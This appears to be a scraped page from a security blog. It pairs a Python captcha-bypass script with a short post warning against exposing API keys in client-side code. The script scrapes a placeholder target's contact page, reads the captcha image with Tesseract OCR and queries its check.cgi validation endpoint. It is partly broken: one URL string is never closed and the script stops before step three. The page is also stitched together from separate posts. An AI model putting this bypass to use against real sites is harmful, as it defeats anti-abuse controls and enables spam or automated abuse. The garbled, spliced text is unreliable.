Burninator Sec: API

import cv2
import pytesseract
from urllib.request import urlopen
import numpy as np
from bs4 import BeautifulSoup
import requests
import urllib.parse
import re

#burninator August 2022

#captcha bypass: by hitting the validation check API directly PLUS using OCR AI library to read the captcha

#contact_check_page = requests.get('https://ip-lookup.net/')

#testRegexTheCode = '/RECAPTCHACODE/RECAPTCHA.png'
#x = re.findall("[0-9]+",testRegexTheCode)
#print(str(x[0]))

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0'}

# STEP ONE - get the recaptcha image text value first, before the .cgi check (order matters!)

#thesoupson = open('TARGET/TARGET.htm', 'r')
thesoupofcontact = requests.get('TARGET/', headers=headers) #also tested and working
thesoupson = thesoupofcontact.text
#for line in thesoupson:
#    print (str(line))

soup = BeautifulSoup(thesoupson, "html.parser")
images = soup.findAll('img')
for image in images:
    if ('recaptcha.png' in image['src']):
        print(str('target captcha ' + image['src']))
        targetCaptcha = image['src']
        recaptchaCodeMatch = re.findall("[0-9]+",targetCaptcha)
        print(str(recaptchaCodeMatch[0]))
        fromRecaptchaUrl = recaptchaCodeMatch[0]

#thesoupson.close()

pytesseract.pytesseract.tesseract_cmd = r'C:\PROGRA~1\Tesseract-OCR\tesseract.exe' #set env vars here because... MEH!

# Loading image using OpenCV
req = urlopen('https://TARGET+targetCaptcha)
arr = np.asarray(bytearray(req.read()), dtype=np.uint8)

img = cv2.imdecode(arr, -1)

#cv2.imshow('lalala', img)
if cv2.waitKey() & 0xff == 27: quit()

#img = cv2.imread('recaptcha.png')

# Converting to text
answerToRecaptcha = pytesseract.image_to_string(img)

print(str("this is the captcha text TEEHEE!" ) + answerToRecaptcha)

#STEP TWO - get the CGI value - usually loaded from Javascript from the
#CGI request is tested and working, tho i just added that cgisouprequestvar:
cgisouprequest = requests.get('https://TARGET/check.cgi')
cgisoup = cgisouprequest.text
print(cgisoup)

#cgisoup = open('TARGET/contact_check.cgi', 'r')
soupses = BeautifulSoup(cgisoup, "html.parser")
inputs = soupses.findAll('input')
for input in inputs:
    print (str(input['value']))
    thevalue = str(input['value'])

#cgisoup.close()

encodeme = urllib.parse.quote(thevalue, safe="")

contactCheckValue = encodeme
print(str(contactCheckValue))

#STEP THREE - build out the POST request with the stuff with the two variables + that same randomized User-Agent string

# also consider building this into either a Burp extension or Turbo Intruder (most likely an extension since it allows calling python modules or other treats from the path)

... is a bad idea.

I was pen testing for a friend, and found that most of the application logic was done client-side, which included a REST call to an API. I generally expect sensitive things like keys, app secrets, etc. to be only called server side in non publicly visible code, or at least reference a configuration file with the proper permissions. It is too easy to hijack someone else's API and either run up the bill, or the API limit, or else misuse it in a destructive way (for example, for the Google custom site image search API, one could use the admin console to limit the custom sites to only not-so-nice images, or an image from a server that lies about the MIME type and returns files with malicious code embedded, etc.)

This will probably happen more and more with the widespread use of APIs, specifically for services directly displayed to the user, such as maps or images, since it is tempting and convenient to just call the API directly client-side.

Burninator Sec

Friday, November 18, 2022

Captcha Bypass Using Tesseract OCR and Python

Saturday, July 28, 2018

Displaying API Keys Client Side